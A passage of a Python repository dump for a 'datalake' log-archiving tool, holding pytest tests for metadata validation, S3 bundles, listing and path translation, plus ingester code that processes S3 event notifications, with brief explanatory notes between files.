def test_work_id_gets_assigned(basic_metadata):
m = Metadata(basic_metadata)
assert 'work_id' in m
assert m['work_id'] is None
def test_id_not_overwritten(basic_metadata):
basic_metadata['id'] = '123'
m = Metadata(basic_metadata)
assert 'id' in m
assert m['id'] == '123'
def test_no_end_allowed(basic_metadata):
del(basic_metadata['end'])
m = Metadata(basic_metadata)
assert m['end'] is None
def test_unallowed_characters(basic_metadata):
basic_metadata['what'] = '123#$'
with pytest.raises(InvalidDatalakeMetadata):
Metadata(basic_metadata)
def test_unallowed_capitals(basic_metadata):
basic_metadata['what'] = 'MYFILE'
with pytest.raises(InvalidDatalakeMetadata):
Metadata(basic_metadata)
def test_unallowed_spaces(basic_metadata):
basic_metadata['where'] = 'SAN FRANCISCO'
with pytest.raises(InvalidDatalakeMetadata):
Metadata(basic_metadata)
def test_unallowed_dots(basic_metadata):
basic_metadata['where'] = 'this.that.com'
with pytest.raises(InvalidDatalakeMetadata):
Metadata(basic_metadata)
def test_work_id_null_string_unallowed(basic_metadata):
basic_metadata['work_id'] = 'null'
with pytest.raises(InvalidDatalakeMetadata):
Metadata(basic_metadata)
def test_work_id_with_unallowed_characters(basic_metadata):
basic_metadata['work_id'] = 'foojob#123'
with pytest.raises(InvalidDatalakeMetadata):
Metadata(basic_metadata)
basic_json = ('{"start": 1426809600000, "what": "apache", "version": 0, '
'"end": 1426895999999, "hash": "12345", "where": "nebraska", '
'"id": "9f8f8b618f48424c8d69a7ed76c88f05", "work_id": null, '
'"path": "/var/log/apache/access.log.1"}')
def test_from_to_json(basic_metadata):
m1 = Metadata.from_json(basic_json)
m2 = m1.json
assert sorted(m2) == sorted(basic_json)
def test_from_invalid_json():
with pytest.raises(InvalidDatalakeMetadata):
Metadata.from_json('{flee floo')
def test_from_none_json():
with pytest.raises(InvalidDatalakeMetadata):
Metadata.from_json(None)
def test_end_before_start(basic_metadata):
end = basic_metadata['end']
basic_metadata['end'] = basic_metadata['start']
basic_metadata['start'] = end
with pytest.raises(InvalidDatalakeMetadata):
Metadata(basic_metadata)
def test_random_metadata(random_metadata):
# Others rely on datalake-common's random_metadata to be valid. So make
# sure it doesn't throw any errors.
Metadata(random_metadata)
def test_normalize_float_date(basic_metadata):
basic_metadata['start'] = '1426809600.123'
m = Metadata(basic_metadata)
assert m['start'] == 1426809600123
def test_normalize_int_date(basic_metadata):
basic_metadata['end'] = '1426809600123'
m = Metadata(basic_metadata)
assert m['end'] == 1426809600123
def test_normalize_date_with_datetime(basic_metadata):
date = dateparse('2015-03-20T00:00:00Z')
ms = Metadata.normalize_date(date)
assert ms == 1426809600000
def test_normalize_garbage(basic_metadata):
with pytest.raises(InvalidDatalakeMetadata):
Metadata.normalize_date('bleeblaaablooo')
def test_path_with_leading_dot_not_allowed(basic_metadata):
basic_metadata['path'] = './abc.txt'
with pytest.raises(InvalidDatalakeMetadata):
Metadata(basic_metadata)
def test_relative_path_not_allowed(basic_metadata):
basic_metadata['path'] = 'abc.txt'
with pytest.raises(InvalidDatalakeMetadata):
Metadata(basic_metadata)
def test_absolute_windows_path(basic_metadata):
path = r'Z:\\foo\bar.txt'
basic_metadata['path'] = path
m = Metadata(basic_metadata)
assert m['path'] == path
def test_absolute_windows_path_single_slash(basic_metadata):
# some cygwin environments seem to have a single slash after the
# drive. Shrug.
path = r'Z:\foo\bar.txt'
basic_metadata['path'] = path
m = Metadata(basic_metadata)
assert m['path'] == path
def test_relative_windows_path_not_allowed(basic_metadata):
basic_metadata['path'] = r'foo\abc.txt'
with pytest.raises(InvalidDatalakeMetadata):
Metadata(basic_metadata)
```
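Taken together, the tests above pin down what a valid metadata record looks like. The commented dict below restates those constraints in one place; it is a distillation of the tests in this file, not an authoritative schema.
```python
# A metadata dict that should satisfy the validation rules exercised above
# (distilled from the tests in this file; not an authoritative schema).
valid_metadata = {
    'version': 0,            # defaults to 0 when omitted; e.g. 100 is rejected
    'start': 1426809600000,  # epoch ms; date strings / second floats normalized
    'end': 1426895999999,    # may be omitted or None, but never before 'start'
    'what': 'apache',        # lowercase, no spaces, dots, or '#'
    'where': 'nebraska',     # required; same character rules as 'what'
    'work_id': None,         # None is fine, the literal string 'null' is not
    'path': '/var/log/apache/access.log.1',  # must be absolute (Windows Z:\ paths allowed)
    'id': '9f8f8b618f48424c8d69a7ed76c88f05',  # assigned if missing, kept if given
    'hash': '12345',         # appears in the canonical JSON example above
}
```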
#### File: client/test/conftest.py
```python
import pytest
from moto import mock_s3
import boto
from six.moves.urllib.parse import urlparse
from datalake.tests import random_metadata, tmpfile # noqa
import os
from click.testing import CliRunner
import stat
import responses
import logging
from datalake.scripts.cli import cli
from datalake import Archive
logging.basicConfig(level=logging.INFO)
@pytest.fixture
def s3_conn(request):
mock = mock_s3()
mock.start()
conn = boto.connect_s3()
def tear_down():
mock.stop()
request.addfinalizer(tear_down)
return conn
BUCKET_NAME = 'datalake-test'
@pytest.fixture
def s3_bucket(s3_conn):
return s3_conn.create_bucket(BUCKET_NAME)
@pytest.fixture
def archive_maker(s3_bucket):
def maker(**kwargs):
kwargs.update(
storage_url='s3://' + s3_bucket.name + '/',
http_url='http://datalake.example.com'
)
return Archive(**kwargs)
return maker
@pytest.fixture
def archive(archive_maker):
return archive_maker()
@pytest.fixture
def s3_key(s3_conn, s3_bucket):
def get_s3_key(url=None):
if url is None:
# if no url is specified, assume there is just one key in the
# bucket. This is the common case for tests that only push one
# item.
keys = [k for k in s3_bucket.list()]
assert len(keys) == 1
return keys[0]
else:
url = urlparse(url)
assert url.scheme == 's3'
bucket = s3_conn.get_bucket(url.netloc)
return bucket.get_key(url.path)
return get_s3_key
@pytest.fixture
def cli_tester(s3_bucket):
def tester(command, expected_exit=0):
os.environ['DATALAKE_STORAGE_URL'] = 's3://' + s3_bucket.name
os.environ['DATALAKE_HTTP_URL'] = 'http://datalake.example.com'
parts = command.split(' ')
runner = CliRunner()
result = runner.invoke(cli, parts, catch_exceptions=False)
assert result.exit_code == expected_exit, result.output
return result.output
return tester
@pytest.fixture # noqa
def datalake_url_maker(archive, tmpfile, random_metadata):
def maker(metadata=random_metadata, content=b''):
f = tmpfile(content)
return archive.prepare_metadata_and_push(f, **metadata)
return maker
crtime = os.environ.get('CRTIME', '/usr/local/bin/crtime')
crtime_available = os.path.isfile(crtime) and os.access(crtime, os.X_OK)
crtime_setuid = False
if crtime_available:
s = os.stat(crtime)
crtime_setuid = s.st_mode & stat.S_ISUID and s.st_uid == 0
def prepare_response(response, status=200, url=None, **query_params):
url = url or 'http://datalake.example.com/v0/archive/files/'
if len(query_params):
q = ['{}={}'.format(k, query_params[k]) for k in query_params.keys()]
url = url + '?' + '&'.join(q)
responses.add(responses.GET, url, json=response, status=status,
match_querystring=True)
```
#### File: client/test/test_file.py
```python
import pytest
from datalake.tests import random_word, random_metadata
from datalake.common import InvalidDatalakeMetadata
import os
import json
import tarfile
from io import BytesIO
from datalake import File, InvalidDatalakeBundle
def random_file(tmpdir, metadata=None):
name = random_word(10)
content = random_word(256)
f = tmpdir.join(name)
f.write(content)
if metadata is None:
metadata = random_metadata()
return File.from_filename(f.strpath, **metadata)
@pytest.fixture
def random_files(tmpdir):
def get_randfiles(n):
return [random_file(tmpdir) for _ in range(n)]
return get_randfiles
def test_file_hash_different(random_files):
files = random_files(2)
assert files[0].metadata['hash'] != files[1].metadata['hash']
def test_non_existent_file():
with pytest.raises(IOError):
File.from_filename('surelythisfiledoesnotexist.txt')
def test_not_enough_metadata(tmpdir):
with pytest.raises(InvalidDatalakeMetadata):
random_file(tmpdir, metadata={'where': 'foo'})
def test_hash_not_overwritten(tmpdir, random_metadata):
random_metadata['hash'] = '1234'
f = random_file(tmpdir, metadata=random_metadata)
assert f.metadata['hash'] == random_metadata['hash']
def test_default_where(monkeypatch, tmpdir, random_metadata):
monkeypatch.setenv('DATALAKE_DEFAULT_WHERE', 'here')
del(random_metadata['where'])
f = random_file(tmpdir, metadata=random_metadata)
assert f.metadata['where'] == 'here'
def test_valid_bundle(tmpdir, random_metadata):
p = os.path.join(str(tmpdir), 'foo.tar')
f1 = random_file(tmpdir, metadata=random_metadata)
f1.to_bundle(p)
f2 = File.from_bundle(p)
assert f1.metadata == f2.metadata
content1 = f1.read()
content2 = f2.read()
assert content1
assert content1 == content2
def test_bundle_not_tar(tmpfile):
f = tmpfile('foobar')
with pytest.raises(InvalidDatalakeBundle):
File.from_bundle(f)
def add_string_to_tar(tfile, arcname, data):
if data is None:
return
s = BytesIO(data)
info = tarfile.TarInfo(name=arcname)
s.seek(0, os.SEEK_END)
info.size = s.tell()
s.seek(0, 0)
tfile.addfile(tarinfo=info, fileobj=s)
@pytest.fixture
def bundle_maker(tmpdir):
def maker(content=None, metadata=None, version=None):
f = random_word(10) + '.tar'
f = os.path.join(str(tmpdir), f)
t = tarfile.open(f, 'w')
add_string_to_tar(t, 'content', content)
add_string_to_tar(t, 'version', version)
add_string_to_tar(t, 'datalake-metadata.json', metadata)
t.close()
return f
return maker
def test_bundle_without_version(bundle_maker, random_metadata):
m = json.dumps(random_metadata).encode('utf-8')
b = bundle_maker(content='1234'.encode('utf-8'), metadata=m)
with pytest.raises(InvalidDatalakeBundle):
File.from_bundle(b)
def test_bundle_without_metadata(bundle_maker):
b = bundle_maker(content='1234'.encode('utf-8'),
version='0'.encode('utf-8'))
with pytest.raises(InvalidDatalakeBundle):
File.from_bundle(b)
def test_bundle_without_content(bundle_maker, random_metadata):
m = json.dumps(random_metadata).encode('utf-8')
b = bundle_maker(metadata=m, version='0'.encode('utf-8'))
with pytest.raises(InvalidDatalakeBundle):
File.from_bundle(b)
def test_bundle_with_non_json_metadata(bundle_maker):
b = bundle_maker(content='1234'.encode('utf-8'),
metadata='not:a%json#'.encode('utf-8'),
version='0'.encode('utf-8'))
with pytest.raises(InvalidDatalakeBundle):
File.from_bundle(b)
def test_bundle_with_invalid_metadata(bundle_maker, random_metadata):
del(random_metadata['what'])
m = json.dumps(random_metadata).encode('utf-8')
b = bundle_maker(content='1234'.encode('utf-8'),
metadata=m,
version='0'.encode('utf-8'))
with pytest.raises(InvalidDatalakeMetadata):
File.from_bundle(b)
here = os.path.dirname(__file__)
legacy_bundles = os.path.join(here, 'legacy_bundles')
def test_pre_python_3_bundle():
# prior to python 3 support, we relied on python to choose the most
# suitable encoding for files. Now we do it explicitly. Make sure legacy
# bundles work.
eyedee = '7c72f3ab092445a08aa6983c864c087c'
expected_content = b'Wake up.\nEat. Mmm.\nHappy hour.\nSleep.\n'
expected_metadata = {
'end': 1474308636507,
'hash': '70373dec2de49d566fc1e34bacca7561',
'id': eyedee,
'path': '/home/brian/src/datalake/chicken.log',
'start': 1474308548000,
'version': 0,
'what': 'chicken',
'where': 'nomad',
'work_id': None
}
b = os.path.join(legacy_bundles, eyedee + '.tar')
f = File.from_bundle(b)
assert f.metadata == expected_metadata
assert f.read() == expected_content
```
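The `bundle_maker` fixture above implies the on-disk bundle layout: a tar archive containing three members named `content`, `version`, and `datalake-metadata.json`. The helper below writes such a bundle by hand just to make that layout explicit; it is an illustrative sketch, not the library's own bundling code.
```python
# Hand-rolled datalake bundle mirroring the layout bundle_maker() builds above
# (member names come from the tests; metadata values are up to the caller).
import io
import json
import tarfile


def write_bundle(path, content, metadata):
    with tarfile.open(path, 'w') as t:
        members = [
            ('content', content),
            ('version', b'0'),
            ('datalake-metadata.json', json.dumps(metadata).encode('utf-8')),
        ]
        for name, data in members:
            info = tarfile.TarInfo(name=name)
            info.size = len(data)
            t.addfile(tarinfo=info, fileobj=io.BytesIO(data))
```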
#### File: client/test/test_list.py
```python
import pytest
import responses
from datalake import DatalakeHttpError
from copy import copy
from datalake.common import Metadata
from datetime import datetime, timedelta
from pytz import utc
import simplejson as json
from conftest import prepare_response
import requests
@responses.activate
def test_list_one_page(archive, random_metadata):
r = {
'records': [
{
'url': 's3://bucket/file',
'metadata': random_metadata,
}
],
'next': None,
}
prepare_response(r, what=random_metadata['what'],
start=random_metadata['start'],
end=random_metadata['end'])
l = list(archive.list(random_metadata['what'],
start=random_metadata['start'],
end=random_metadata['end']))
assert len(l) == 1
assert l[0]['url'] == 's3://bucket/file'
assert l[0]['metadata'] == random_metadata
@responses.activate
def test_list_two_pages(archive, random_metadata):
m1 = copy(random_metadata)
m1['id'] = '1'
r1 = {
'records': [
{
'url': 's3://bucket/file1',
'metadata': m1,
}
],
'next': 'http://the-next-url/',
}
prepare_response(r1, what=random_metadata['what'], start=m1['start'],
end=m1['end'])
m2 = copy(random_metadata)
m2['id'] = '2'
r2 = {
'records': [
{
'url': 's3://bucket/file2',
'metadata': m2,
}
],
'next': None,
}
prepare_response(r2, url='http://the-next-url/')
l = list(archive.list(m1['what'],
start=random_metadata['start'],
end=random_metadata['end']))
assert len(l) == 2
assert l[0]['url'] == 's3://bucket/file1'
assert l[0]['metadata'] == m1
assert l[1]['url'] == 's3://bucket/file2'
assert l[1]['metadata'] == m2
@responses.activate
def test_bad_request(archive):
r = {
"code": "NoWorkInterval",
"message": "You must provide either work_id or start/end"
}
prepare_response(r, status=400, what='syslog')
with pytest.raises(DatalakeHttpError):
list(archive.list('syslog'))
@responses.activate
def test_internal_server_error(archive):
r = 'INTERNAL SERVER ERROR'
prepare_response(r, status=500, what='syslog')
with pytest.raises(DatalakeHttpError):
list(archive.list('syslog'))
@pytest.fixture
def date_tester(archive, random_metadata):
def tester(start, end):
random_metadata['start'] = Metadata.normalize_date(start)
random_metadata['end'] = Metadata.normalize_date(end)
r = {
'records': [
{
'url': 's3://bucket/file',
'metadata': random_metadata,
}
],
'next': None,
}
prepare_response(r, what=random_metadata['what'],
start=random_metadata['start'],
end=random_metadata['end'])
l = list(archive.list(random_metadata['what'], start=start, end=end))
assert len(l) == 1
assert l[0]['url'] == 's3://bucket/file'
assert l[0]['metadata'] == random_metadata
return tester
@responses.activate
def test_datetime_date(date_tester):
start = datetime.now(utc) - timedelta(days=1)
end = datetime.now(utc)
date_tester(start, end)
@responses.activate
def test_human_readable_date(date_tester):
start = '1977-01-01'
end = '1977-01-02'
date_tester(start, end)
@responses.activate
def test_with_where(archive, random_metadata):
r = {
'records': [
{
'url': 's3://bucket/file',
'metadata': random_metadata,
}
],
'next': None,
}
prepare_response(r, what=random_metadata['what'],
where=random_metadata['where'],
start=random_metadata['start'],
end=random_metadata['end'])
l = list(archive.list(random_metadata['what'],
where=random_metadata['where'],
start=random_metadata['start'],
end=random_metadata['end']))
assert len(l) == 1
assert l[0]['url'] == 's3://bucket/file'
assert l[0]['metadata'] == random_metadata
@responses.activate
def test_with_work_id(archive, random_metadata):
random_metadata['work_id'] = 'foo123'
r = {
'records': [
{
'url': 's3://bucket/file',
'metadata': random_metadata,
}
],
'next': None,
}
prepare_response(r, what=random_metadata['what'],
work_id=random_metadata['work_id'])
l = list(archive.list(random_metadata['what'],
work_id='foo123'))
assert len(l) == 1
assert l[0]['url'] == 's3://bucket/file'
assert l[0]['metadata'] == random_metadata
@responses.activate
def test_list_cli_url_format(cli_tester, random_metadata):
r = {
'records': [
{
'url': 's3://thisistheurl',
'metadata': random_metadata,
},
{
'url': 's3://thisistheotherurl',
'metadata': random_metadata,
}
],
'next': None,
}
prepare_response(r, what=random_metadata['what'],
start=random_metadata['start'],
end=random_metadata['end'])
cmd = 'list {what} --start={start} --end={end}'
cmd = cmd.format(**random_metadata)
output = cli_tester(cmd)
assert output == 's3://thisistheurl\ns3://thisistheotherurl\n'
@responses.activate
def test_list_cli_json_format(cli_tester, random_metadata):
m1 = copy(random_metadata)
m1['id'] = '1'
m1['work_id'] = 'foo1234'
m2 = copy(random_metadata)
m2['id'] = '2'
m2['work_id'] = 'foo1234'
r = {
'records': [
{
'url': 's3://url1',
'metadata': m1,
},
{
'url': 's3://url2',
'metadata': m2,
}
],
'next': None,
}
prepare_response(r, what=m1['what'], work_id=m1['work_id'])
cmd = 'list {what} --work-id={work_id} --format=json'
cmd = cmd.format(**m1)
output_lines = cli_tester(cmd).rstrip('\n').split('\n')
assert len(output_lines) == 2
output_jsons = [json.loads(l) for l in output_lines]
for record in r['records']:
assert record in output_jsons
@responses.activate
def test_list_cli_http_format(cli_tester, random_metadata):
m1 = copy(random_metadata)
m1['id'] = '1'
m1['work_id'] = 'foo1234'
m2 = copy(random_metadata)
m2['id'] = '2'
m2['work_id'] = 'foo1234'
r = {
'records': [
{
'url': 's3://url1',
'http_url': 'https://foo.com/url1',
'metadata': m1,
},
{
'url': 's3://url2',
'http_url': 'https://foo.com/url2',
'metadata': m2,
}
],
'next': None,
}
prepare_response(r, what=m1['what'], work_id=m1['work_id'])
cmd = 'list {what} --work-id={work_id} --format=http'
cmd = cmd.format(**m1)
output = cli_tester(cmd).rstrip('\n').split('\n')
assert output == ['https://foo.com/url1', 'https://foo.com/url2']
@responses.activate
def test_list_cli_human_format(cli_tester, random_metadata):
m1 = copy(random_metadata)
m1['id'] = '1'
m1['work_id'] = 'foo1234'
m1['start'] = 1612548642000
m1['end'] = 1612548643000
m2 = copy(random_metadata)
m2['id'] = '2'
m2['work_id'] = 'foo1234'
m2['start'] = 1612548642000
m2['end'] = 1612548643000
r = {
'records': [
{
'url': 's3://url1',
'metadata': m1,
},
{
'url': 's3://url2',
'metadata': m2,
}
],
'next': None,
}
prepare_response(r, what=m1['what'], work_id=m1['work_id'])
cmd = 'list {what} --work-id={work_id} --format=human'
cmd = cmd.format(**m1)
stanzas = [s for s in cli_tester(cmd).split('\n\n') if s]
for s in stanzas:
lines = [l for l in s.split('\n')]
# just check for the start/end
assert 'start: 2021-02-05T18:10:42+00:00' in lines
assert 'end: 2021-02-05T18:10:43+00:00' in lines
print(stanzas)
assert len(stanzas) == 2
@responses.activate
def test_list_cli_human_format_no_end_time(cli_tester, random_metadata):
m1 = copy(random_metadata)
m1['id'] = '1'
m1['work_id'] = 'foo1234'
m1['start'] = 1612548642000
m1['end'] = None
m2 = copy(random_metadata)
m2['id'] = '2'
m2['work_id'] = 'foo1234'
m2['start'] = 1612548642000
m2['end'] = None
r = {
'records': [
{
'url': 's3://url1',
'metadata': m1,
},
{
'url': 's3://url2',
'metadata': m2,
}
],
'next': None,
}
prepare_response(r, what=m1['what'], work_id=m1['work_id'])
cmd = 'list {what} --work-id={work_id} --format=human'
cmd = cmd.format(**m1)
stanzas = [s for s in cli_tester(cmd).split('\n\n') if s]
for s in stanzas:
lines = [l for l in s.split('\n')]
# just check for the start/end
assert 'start: 2021-02-05T18:10:42+00:00' in lines
assert 'end: null' in lines
assert len(stanzas) == 2
TEST_REQUESTS = []
class SessionWrapper(requests.Session):
def __init__(self, *args, **kwargs):
global TEST_REQUESTS
TEST_REQUESTS = []
return super(SessionWrapper, self).__init__(*args, **kwargs)
def request(self, method, url, **kwargs):
global TEST_REQUESTS
TEST_REQUESTS.append((method, url))
return super(SessionWrapper, self).request(method, url, **kwargs)
@responses.activate
def test_list_with_injected_session(archive_maker, random_metadata):
r = {
'records': [
{
'url': 's3://bucket/file',
'metadata': random_metadata,
}
],
'next': None,
}
prepare_response(r, what=random_metadata['what'],
start=random_metadata['start'],
end=random_metadata['end'])
s = SessionWrapper()
a = archive_maker(session=s)
l = list(a.list(random_metadata['what'],
start=random_metadata['start'],
end=random_metadata['end']))
assert len(TEST_REQUESTS) > 0
assert len(l) > 0
assert l[0]['url'] == 's3://bucket/file'
assert l[0]['metadata'] == random_metadata
@responses.activate
def test_list_with_session_class(monkeypatch,
archive_maker,
random_metadata):
r = {
'records': [
{
'url': 's3://bucket/file',
'metadata': random_metadata,
}
],
'next': None,
}
prepare_response(r, what=random_metadata['what'],
start=random_metadata['start'],
end=random_metadata['end'])
monkeypatch.setenv('DATALAKE_SESSION_CLASS', 'test_list.SessionWrapper')
a = archive_maker()
l = list(a.list(random_metadata['what'],
start=random_metadata['start'],
end=random_metadata['end']))
assert len(TEST_REQUESTS) > 0
assert len(l) > 0
assert l[0]['url'] == 's3://bucket/file'
assert l[0]['metadata'] == random_metadata
```
#### File: client/test/test_translator.py
```python
import pytest
from datalake import Translator, TranslatorError
def test_valid():
t = Translator('.*job-(?P<job_id>[0-9]+).log$~job{job_id}')
s = t.translate('/var/log/jobs/job-1234.log')
assert s == 'job1234'
def test_extract_from_path():
t = Translator('.*/(?P<server_name>.*)/job-[0-9]+.log$~{server_name}')
s = t.translate('/var/log/jobs/myserver/job-1234.log')
assert s == 'myserver'
def test_missing_tilde():
with pytest.raises(TranslatorError):
Translator('no-tilde-here')
def test_too_many_tildes():
with pytest.raises(TranslatorError):
Translator('here-a~there-a~')
def test_format_missing_right_brace():
with pytest.raises(TranslatorError):
t = Translator('.*job-(?P<job_id>[0-9]+).log$~job{job_id')
t.translate('/var/log/jobs/job-1234.log')
def test_format_missing_left_brace():
with pytest.raises(TranslatorError):
t = Translator('.*job-(?P<job_id>[0-9]+).log$~jobjob_id}')
t.translate('/var/log/jobs/job-1234.log')
def test_format_missing_named_group():
with pytest.raises(TranslatorError):
t = Translator('.*job-([0-9]+).log$~job{job_id}')
t.translate('/var/log/jobs/job-1234.log')
def test_invalid_group_name():
with pytest.raises(TranslatorError):
Translator('.*job-(?P<job_id[0-9]+).log$~job{job_id}')
def test_unbalanced_parenthesis():
with pytest.raises(TranslatorError):
Translator('.*job-(?P<job_id>[0-9]+.log$~job{job_id}')
def test_extract_does_not_match():
with pytest.raises(TranslatorError):
t = Translator('.*job-(?P<job_id>[0-9]+).log$~job{job_id}')
t.translate('/var/log/jobs/foo-1234.log')
def test_unexpected_name_in_format():
with pytest.raises(TranslatorError):
t = Translator('.*job-(?P<job_id>[0-9]+).log$~job{foo_id}')
t.translate('/var/log/jobs/job-1234.log')
def test_not_absolute_path():
with pytest.raises(TranslatorError):
t = Translator('.*job-(?P<job_id>[0-9]+).log$~job{job_id}')
t.translate('var/log/jobs/job-1234.log')
```
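The tests above amount to a specification: a translator spec is a regex with named groups and a format string separated by a single `~`, and any mismatch between the two is a `TranslatorError`. The class below is a from-scratch sketch of that behaviour for illustration; it is not the datalake package's actual `Translator` implementation.
```python
# Illustrative re-implementation of the "extract~format" contract the tests
# above describe. This is a sketch only, not the real datalake Translator.
import re


class TranslatorError(Exception):
    pass


class SimpleTranslator(object):
    def __init__(self, spec):
        parts = spec.split('~')
        if len(parts) != 2:
            raise TranslatorError('spec must contain exactly one "~"')
        extract, self.format = parts
        try:
            self.regex = re.compile(extract)
        except re.error as e:
            raise TranslatorError(str(e))

    def translate(self, path):
        if not path.startswith('/'):
            raise TranslatorError('path must be absolute: ' + path)
        m = self.regex.match(path)
        if m is None:
            raise TranslatorError('extract expression did not match ' + path)
        try:
            return self.format.format(**m.groupdict())
        except (KeyError, IndexError, ValueError) as e:
            raise TranslatorError(str(e))


assert SimpleTranslator('.*job-(?P<job_id>[0-9]+).log$~job{job_id}') \
    .translate('/var/log/jobs/job-1234.log') == 'job1234'
```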
#### File: ingester/datalake_ingester/ingester.py
```python
from datalake.common import DatalakeRecord, InvalidDatalakeMetadata
from datalake.common.errors import InsufficientConfiguration, \
UnsupportedTimeRange, NoSuchDatalakeFile, UnsupportedS3Event
from s3_notification import S3Notification
import time
import logging
from storage import DynamoDBStorage
from queue import SQSQueue
from reporter import SNSReporter
from errors import InvalidS3Notification, InvalidS3Event
logger = logging.getLogger('ingester')
# This is a list of exceptions that we may encounter that do not compromise our
# ability to ingest. These we simply wish to log, report, and move on.
SAFE_EXCEPTIONS = [
InvalidS3Notification,
InvalidS3Event,
UnsupportedTimeRange,
NoSuchDatalakeFile,
InvalidDatalakeMetadata,
UnsupportedS3Event
]
class IngesterReport(dict):
def start(self):
self.start = time.time()
self['start'] = int(self.start * 1000)
self.records = {}
return self
def add_record(self, r):
self.records[r['url']] = r
def end(self):
self['status'] = 'success'
self._finalize_report()
return self
def error(self, message):
self['status'] = 'error'
self['message'] = message
self._finalize_report()
return self
def _finalize_report(self):
self._set_records()
self._set_duration()
def _set_duration(self):
self['duration'] = time.time() - self.start
def _set_records(self):
self['records'] = [self._make_record(r) for r in self.records.values()]
def _make_record(self, r):
return {
'url': r['url'],
'size': r['size'],
'create_time': r['create_time'],
'metadata': r['metadata']
}
class Ingester(object):
def __init__(self, storage, queue=None, reporter=None):
self.storage = storage
self.queue = queue
self.reporter = reporter
@classmethod
def from_config(cls):
storage = DynamoDBStorage.from_config()
queue = SQSQueue.from_config()
reporter = SNSReporter.from_config()
return cls(storage, queue=queue, reporter=reporter)
def ingest(self, url):
'''ingest the metadata associated with the given url'''
records = DatalakeRecord.list_from_url(url)
for r in records:
self.storage.store(r)
def handler(self, msg):
ir = IngesterReport().start()
try:
self._handler(msg, ir)
ir.end()
except Exception as e:
logger.exception(e)
ir.error(e.message)
if type(e) not in SAFE_EXCEPTIONS:
raise
finally:
self._report(ir)
def _handler(self, s3_notification, ir):
n = S3Notification(s3_notification)
for e in n.events:
if e.event_name == 'ObjectCreated:Put':
self._add_records(e.datalake_records, ir)
elif e.event_name == 'ObjectCreated:Copy':
self._update_records(e.datalake_records, ir)
elif e.event_name == 'ObjectCreated:CompleteMultipartUpload':
self._add_records(e.datalake_records, ir)
else:
msg = 'Datalake does not support S3 publish event type {}.'
msg = msg.format(e.event_name)
raise UnsupportedS3Event(msg)
def _add_records(self, datalake_records, ir):
for r in datalake_records:
ir.add_record(r)
self.storage.store(r)
def _update_records(self, datalake_records, ir):
for r in datalake_records:
ir.add_record(r)
self.storage.update(r)
def _report(self, r):
if self.reporter is None:
return
self.reporter.report(r)
def listen(self, timeout=None):
'''listen to the queue, ingest what you hear, and report'''
if not self.queue:
raise InsufficientConfiguration('No queue configured.')
self.queue.set_handler(self.handler)
self.queue.drain(timeout=timeout)
```
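`Ingester` only requires duck-typed collaborators: a storage with `store`/`update`, a queue with `set_handler`/`drain`, and a reporter with `report`. The in-memory stand-ins below are hypothetical test doubles (not classes from this repository) meant to make those interfaces explicit.
```python
# Hypothetical in-memory stand-ins for Ingester's collaborators; these stubs
# are illustrative only and are not part of the datalake_ingester package.
class MemoryStorage(object):
    def __init__(self):
        self.records = []

    def store(self, record):
        self.records.append(record)

    def update(self, record):
        self.records.append(record)


class MemoryQueue(object):
    def __init__(self, messages):
        self.messages = messages
        self.handler = None

    def set_handler(self, handler):
        self.handler = handler

    def drain(self, timeout=None):
        for msg in self.messages:
            self.handler(msg)


class PrintReporter(object):
    def report(self, ingester_report):
        print(ingester_report)


# Wiring it together (notifications would be real SNS/S3 messages):
# Ingester(MemoryStorage(), queue=MemoryQueue(notifications),
#          reporter=PrintReporter()).listen(timeout=1)
```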
#### File: ingester/datalake_ingester/s3_notification.py
```python
from memoized_property import memoized_property
import simplejson as json
from errors import InvalidS3Notification, InvalidS3Event
from datalake.common import DatalakeRecord
class S3Notification(dict):
def __init__(self, s3_notification):
self.message = s3_notification.get('Message')
if self.message is None:
raise InvalidS3Notification(self.message)
self.message = json.loads(self.message)
super(S3Notification, self).__init__(self.message)
@memoized_property
def events(self):
if self.get('Event') == 's3:TestEvent':
return []
return [S3Event(r) for r in self.message['Records']]
class S3Event(dict):
EVENTS_WITH_RECORDS = [
'ObjectCreated:Put',
'ObjectCreated:Copy',
'ObjectCreated:CompleteMultipartUpload'
]
def __init__(self, event):
super(S3Event, self).__init__(event)
self._validate()
def _validate(self):
self._validate_version()
def _validate_version(self):
v = self.get('eventVersion')
if v is None:
msg = 'No eventVersion: ' + json.dumps(self)
raise InvalidS3Event(msg)
if not v.startswith('2.'):
msg = 'Unsupported event version: ' + json.dumps(self)
raise InvalidS3Event(msg)
@memoized_property
def datalake_records(self):
if self['eventName'] not in self.EVENTS_WITH_RECORDS:
return []
return [dlr for dlr in DatalakeRecord.list_from_url(self.s3_url)]
@property
def s3_url(self):
return 's3://' + self.bucket_name + '/' + self.key_name
@property
def bucket_name(self):
return self['s3']['bucket']['name']
@property
def key_name(self):
return self['s3']['object']['key']
@property
def event_name(self):
return self['eventName']
```
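`S3Notification` expects an SNS-wrapped S3 event: a `Message` field holding JSON with a `Records` list whose entries carry a 2.x `eventVersion`, an `eventName`, and `s3.bucket.name` / `s3.object.key`. The dict below sketches that minimal shape with placeholder bucket and key names.
```python
# Minimal shape of the SNS-wrapped S3 notification parsed above (placeholder
# bucket/key values; real notifications carry many more fields).
import simplejson as json

minimal_notification = {
    'Message': json.dumps({
        'Records': [
            {
                'eventVersion': '2.0',
                'eventName': 'ObjectCreated:Put',
                's3': {
                    'bucket': {'name': 'datalake-test'},
                    'object': {'key': 'some-file-id/data'},
                },
            }
        ]
    })
}

# S3Notification(minimal_notification).events[0].s3_url would then be
# 's3://datalake-test/some-file-id/data'. datalake_records is not touched here
# because it fetches the file's metadata from S3.
```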
#### File: ingester/tests/test_queue.py
```python
import pytest
import time
import simplejson as json
from datalake_ingester import SQSQueue
@pytest.fixture
def handler():
class Handler(object):
messages = []
def __call__(self, msg):
self.messages.append(msg)
return Handler()
def test_sqs_queue_timeout(bare_sqs_queue, handler):
q = SQSQueue(bare_sqs_queue.name, handler)
start = time.time()
q.drain(timeout=1)
duration = time.time() - start
error = abs(duration - 1.0)
assert error < 0.1
assert handler.messages == []
def test_sqs_queue_drain(bare_sqs_queue, handler):
q = SQSQueue(bare_sqs_queue.name, handler)
expected_msg = {'foo': 'bar'}
msg = bare_sqs_queue.new_message(json.dumps(expected_msg))
bare_sqs_queue.write(msg)
q.drain(timeout=1)
assert handler.messages == [expected_msg]
handler.messages = []
q.drain(timeout=1)
assert handler.messages == []
```
#### File: ingester/tests/test_s3_notifications.py
```python
import pytest
from datalake_ingester import S3Notification
from freezegun import freeze_time
def _import_exception(exception_name):
mod_name = '.'.join(exception_name.split('.')[0:-1])
exception_name = exception_name.split('.')[-1]
mod = __import__(mod_name, fromlist=[str(exception_name)])
return getattr(mod, exception_name)
